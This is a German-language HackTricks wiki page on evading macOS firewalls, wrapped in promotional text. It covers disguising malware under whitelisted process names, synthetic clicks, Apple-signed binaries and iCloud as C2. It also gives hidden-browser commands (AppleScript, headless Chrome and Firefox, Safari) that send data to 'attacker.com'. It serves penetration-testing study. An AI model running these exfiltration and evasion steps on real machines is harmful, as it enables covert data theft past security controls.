macOS Bypassing Firewalls

Erlernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

Wenn Sie Ihr Unternehmen in HackTricks beworben sehen möchten oder HackTricks im PDF-Format herunterladen möchten, überprüfen Sie die ABONNEMENTPLÄNE!
Holen Sie sich das offizielle PEASS & HackTricks-Merch
Entdecken Sie The PEASS Family, unsere Sammlung exklusiver NFTs
Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @carlospolopm.
Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud Github-Repositorys einreichen.

Gefundene Techniken

Die folgenden Techniken wurden in einigen macOS-Firewall-Apps gefunden.

Missbrauch von Whitelist-Namen

Zum Beispiel das Benennen von Malware mit Namen bekannter macOS-Prozesse wie launchd

Synthetischer Klick

Wenn die Firewall den Benutzer um Erlaubnis bittet, kann die Malware auf Erlauben klicken

Verwendung von von Apple signierten Binärdateien

Wie curl, aber auch andere wie whois

Bekannte Apple-Domains

Die Firewall könnte Verbindungen zu bekannten Apple-Domains wie apple.com oder icloud.com zulassen. Und iCloud könnte als C2 verwendet werden.

Generischer Umgehungsweg

Einige Ideen, um Firewalls zu umgehen

Überprüfen des erlaubten Datenverkehrs

Das Wissen über den erlaubten Datenverkehr hilft Ihnen dabei, potenziell in die Whitelist aufgenommene Domains oder die Anwendungen zu identifizieren, die darauf zugreifen dürfen.

lsof -i TCP -sTCP:ESTABLISHED

Ausnutzen von DNS

DNS-Auflösungen werden über die signierte Anwendung mdnsreponder durchgeführt, die wahrscheinlich Zugriff auf DNS-Server haben wird.

Über Browser-Apps

oascript

tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell

Google Chrome

"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"

Firefox

firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"

Safari

open -j -a Safari "https://attacker.com?data=data%20to%20exfil"

Über Prozessinjektionen

Wenn Sie Code in einen Prozess injizieren können, der berechtigt ist, eine Verbindung zu einem beliebigen Server herzustellen, könnten Sie die Firewall-Schutzmaßnahmen umgehen:

pagemacOS Process Abuse

Referenzen

https://www.youtube.com/watch?v=UlT5KFTMn2k

Erlernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

Wenn Sie Ihr Unternehmen in HackTricks beworben sehen möchten oder HackTricks im PDF-Format herunterladen möchten, überprüfen Sie die ABONNEMENTPLÄNE!
Holen Sie sich das offizielle PEASS & HackTricks-Merchandise
Entdecken Sie The PEASS Family, unsere Sammlung exklusiver NFTs
Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @carlospolopm.
Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repositories einreichen.

PreviousmacOS AppleFS NextmacOS Defensive Apps

Last updated 3 days ago